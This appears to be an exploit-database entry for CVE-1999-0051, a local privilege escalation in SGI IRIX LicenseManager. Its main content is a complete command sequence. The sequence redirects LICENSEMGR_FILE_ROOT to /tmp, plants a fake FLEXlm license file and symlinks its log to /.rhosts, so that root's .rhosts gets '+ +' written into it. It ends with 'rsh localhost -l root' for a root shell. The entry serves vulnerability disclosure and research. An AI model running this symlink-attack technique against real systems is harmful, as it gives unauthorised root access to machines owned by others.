SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation

Author: Yuri Volobuev
type: local
platform: irix
port: nan
date_added: 1996-11-22 
date_updated: 2017-11-16 
verified: 1 
codes: OSVDB-897;CVE-1999-0051 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/73/info

Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.

% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &

Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.

% cat /.rhosts


Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996

#
# FLEXlm license file
#

FEATURE + + blah sgifd 1.00 01-jan-0 0 blah

% rsh localhost -l root
#